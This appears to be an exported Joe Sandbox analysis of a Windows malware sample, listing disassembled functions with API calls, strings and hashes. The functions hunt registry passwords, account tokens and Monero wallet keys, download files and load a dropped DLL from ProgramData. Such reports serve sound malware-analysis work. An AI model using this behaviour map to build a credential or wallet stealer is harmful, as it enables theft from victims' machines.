                                      • lstrcat.KERNEL32(00000000,00000000), ref: 001176EF
                                      • lstrcat.KERNEL32(00000000,00131934), ref: 00117700
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00117733
                                      • lstrcat.KERNEL32(00000000,00131938), ref: 0011774D
                                      • task.LIBCPMTD ref: 0011775B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID: :
                                      • API String ID: 2677904052-3653984579
                                      • Opcode ID: 088d0e1cb51c558d13479f6b894e33319f48985f15b73a978e7702c4273e23a0
                                      • Instruction ID: da197a7fe135e0aab0bab73622df84540e0dfd6747487fcf69c355d16dafae60
                                      • Opcode Fuzzy Hash: 088d0e1cb51c558d13479f6b894e33319f48985f15b73a978e7702c4273e23a0
                                      • Instruction Fuzzy Hash: A3314F72904148EFDB19EBE0DD95DFE7779AB54301F504628F202AB2E1DB34AD86CB50
                                      Function 00128290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E3F308,00000000,?,00130E14,00000000,?,00000000), ref: 001282C0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001282C7
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 001282E8
                                      • __aulldiv.LIBCMT ref: 00128302
                                      • __aulldiv.LIBCMT ref: 00128310
                                      • wsprintfA.USER32 ref: 0012833C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2774356765-3474575989
                                      • Opcode ID: 05ef75d4c7f39097d93a716b19b53b5aec6ae5c5ac030601e1ab9478e14ee807
                                      • Instruction ID: 3f3d4547bb19292303fc907c09160a4f9b91a2fed84349281998b7e979e555a2
                                      • Opcode Fuzzy Hash: 05ef75d4c7f39097d93a716b19b53b5aec6ae5c5ac030601e1ab9478e14ee807
                                      • Instruction Fuzzy Hash: AE215EB1E44218ABDB14DFD4DC45FAEB7B8FB44B00F104609F215BB2C0C77859018BA4
                                      Function 001160F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                        • Part of subcall function 00114800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00114889
                                        • Part of subcall function 00114800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00114899
                                      • InternetOpenA.WININET(00130DFB,00000001,00000000,00000000,00000000), ref: 0011615F
                                      • StrCmpCA.SHLWAPI(?,00E3F970), ref: 00116197
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001161DF
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00116203
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 0011622C
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0011625A
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00116299
                                      • InternetCloseHandle.WININET(?), ref: 001162A3
                                      • InternetCloseHandle.WININET(00000000), ref: 001162B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2507841554-0
                                      • Opcode ID: 3d0667f66d420ac8ec4f6d953cf51756d98a12ed9d53d793ea89461b4a8b48c6
                                      • Instruction ID: a08d98c1088e1899454ed0d2309bbd198810a2710991a79710e4b180fa923e09
                                      • Opcode Fuzzy Hash: 3d0667f66d420ac8ec4f6d953cf51756d98a12ed9d53d793ea89461b4a8b48c6
                                      • Instruction Fuzzy Hash: EE5173B1A00218ABDF24DF90DC85BEE7779AF44301F4085A8F605AB1C0DB756AC9CF95
                                      Function 0019012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • type_info::operator==.LIBVCRUNTIME ref: 0019024D
                                      • ___TypeMatch.LIBVCRUNTIME ref: 0019035B
                                      • CatchIt.LIBVCRUNTIME ref: 001903AC
                                      • CallUnexpected.LIBVCRUNTIME ref: 001904C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 2356445960-393685449
                                      • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction ID: 431c260db63edbdada37082c6868609ff5e0420a93f255eddd5da0351d7a7ced
                                      • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction Fuzzy Hash: 71B16B75C00209EFCF2AEFA4D8859AEBBB5FF18310F14416AE9156B212D731DA51CF91
                                      Function 00117330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0011739A
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00117411
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0011746D
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 001174B2
                                      • HeapFree.KERNEL32(00000000), ref: 001174B9
                                      • task.LIBCPMTD ref: 001175B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetask
                                      • String ID: Password
                                      • API String ID: 775622407-3434357891
                                      • Opcode ID: bf177f27c2d0252f202971852301b152ee102250f5ab8d0960031f22e2871d58
                                      • Instruction ID: 4f49139e90fa705665f7368642f4b391c8eacf029c774a863d69dcfbe292dd79
                                      • Opcode Fuzzy Hash: bf177f27c2d0252f202971852301b152ee102250f5ab8d0960031f22e2871d58
                                      • Instruction Fuzzy Hash: EA613DB590416C9BDB28DB50CC51BD9B7B8BF58300F0081E9E649A6281EF706BC9CF90
                                      Function 00124300 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 124registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,00E3E5A0,00000000,00020119,?), ref: 00124344
                                      • RegQueryValueExA.ADVAPI32(?,00E3F5A8,00000000,00000000,00000000,000000FF), ref: 00124368
                                      • RegCloseKey.ADVAPI32(?), ref: 00124372
                                      • lstrcat.KERNEL32(?,00000000), ref: 00124397
                                      • lstrcat.KERNEL32(?,00E3F5C0), ref: 001243AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValue
                                      • String ID: $@
                                      • API String ID: 690832082-3381419911
                                      • Opcode ID: 1e77ec6275d06e92e99304740015e7921b31845786e43c7eeeaa3fe11218784a
                                      • Instruction ID: 6a5f18502d2814df567a13ab22eeafea0623ac5d2195b9d22c8ad6615c0e466e
                                      • Opcode Fuzzy Hash: 1e77ec6275d06e92e99304740015e7921b31845786e43c7eeeaa3fe11218784a
                                      • Instruction Fuzzy Hash: 8E4197B6900118ABDB25EBA0EC97FEE733DABA8300F00465CB7155A1C1EF7156D88BD1
                                      Function 0011BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 0012ACC0: lstrlen.KERNEL32(?,00E39450,?,\Monero\wallet.keys,00130E1A), ref: 0012ACD5
                                        • Part of subcall function 0012ACC0: lstrcpy.KERNEL32(00000000), ref: 0012AD14
                                        • Part of subcall function 0012ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0012AD22
                                        • Part of subcall function 0012AC30: lstrcpy.KERNEL32(00000000,?), ref: 0012AC82
                                        • Part of subcall function 0012AC30: lstrcat.KERNEL32(00000000), ref: 0012AC92
                                        • Part of subcall function 0012ABB0: lstrcpy.KERNEL32(?,00130E1A), ref: 0012AC15
                                        • Part of subcall function 0012AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0012AAF6
                                      • lstrlen.KERNEL32(00000000), ref: 0011BC6F
                                        • Part of subcall function 00128FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00128FE2
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0011BC9D
                                      • lstrlen.KERNEL32(00000000), ref: 0011BD75
                                      • lstrlen.KERNEL32(00000000), ref: 0011BD89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 3073930149-1079375795
                                      • Opcode ID: 7d96b22c609d87056d58276ab87cdf37aa9a3cb02b9f0b9186fa75d456cdb33b
                                      • Instruction ID: 5d0ec187cba72ce5f1cb278817a028e93c2f578652378515f90cc9afa702b11a
                                      • Opcode Fuzzy Hash: 7d96b22c609d87056d58276ab87cdf37aa9a3cb02b9f0b9186fa75d456cdb33b
                                      • Instruction Fuzzy Hash: 4BB1F471910118ABCF18FBA0EDA6EEE737DAF64300F804569F50677191EF346A58CB62
                                      Function 00126A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: a1178e0439aacce7e5fadf47b9ff96845f72936e714e89dcd459c3362b0b125e
                                      • Instruction ID: 14f5644ba1adf2042cb6b3644e986c2fbb420460d27b93123e6e9924d6949f35
                                      • Opcode Fuzzy Hash: a1178e0439aacce7e5fadf47b9ff96845f72936e714e89dcd459c3362b0b125e
                                      • Instruction Fuzzy Hash: 9DF05E3094C389EFD3699FE0E84975CBB38EF04707F114295F60AAA1D1C6744A919B51
                                      Function 001249D0 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcat.KERNEL32(?,00E3F6E0), ref: 00124A2B
                                        • Part of subcall function 00128F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00128F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00124A51
                                      • lstrcat.KERNEL32(?,?), ref: 00124A70
                                      • lstrcat.KERNEL32(?,?), ref: 00124A84
                                      • lstrcat.KERNEL32(?,00E2A620), ref: 00124A97
                                      • lstrcat.KERNEL32(?,?), ref: 00124AAB
                                      • lstrcat.KERNEL32(?,00E3E660), ref: 00124ABF
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 00128F20: GetFileAttributesA.KERNEL32(00000000,?,00111B94,?,?,0013577C,?,?,00130E22), ref: 00128F2F
                                        • Part of subcall function 001247C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001247D0
                                        • Part of subcall function 001247C0: RtlAllocateHeap.NTDLL(00000000), ref: 001247D7
                                        • Part of subcall function 001247C0: wsprintfA.USER32 ref: 001247F6
                                        • Part of subcall function 001247C0: FindFirstFileA.KERNEL32(?,?), ref: 0012480D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID: `
                                      • API String ID: 2540262943-4168407445
                                      • Opcode ID: ebdc5a087366853c74a41f0ecbc694923303982fcdc7238dcdca29e7455a1086
                                      • Instruction ID: f6db4e4d071a9d80054851b42171b9ffaabdaac5681d70ce553646de56679c77
                                      • Opcode Fuzzy Hash: ebdc5a087366853c74a41f0ecbc694923303982fcdc7238dcdca29e7455a1086
                                      • Instruction Fuzzy Hash: A03160B290021867CB25FBB0ECC6EDD733CAB68700F404A89B34596095EF70A7D8CB94
                                      Function 001208A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                        • Part of subcall function 00129850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,001208DC,C:\ProgramData\chrome.dll), ref: 00129871
                                        • Part of subcall function 0011A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0011A098
                                      • StrCmpCA.SHLWAPI(00000000,00E39330), ref: 00120922
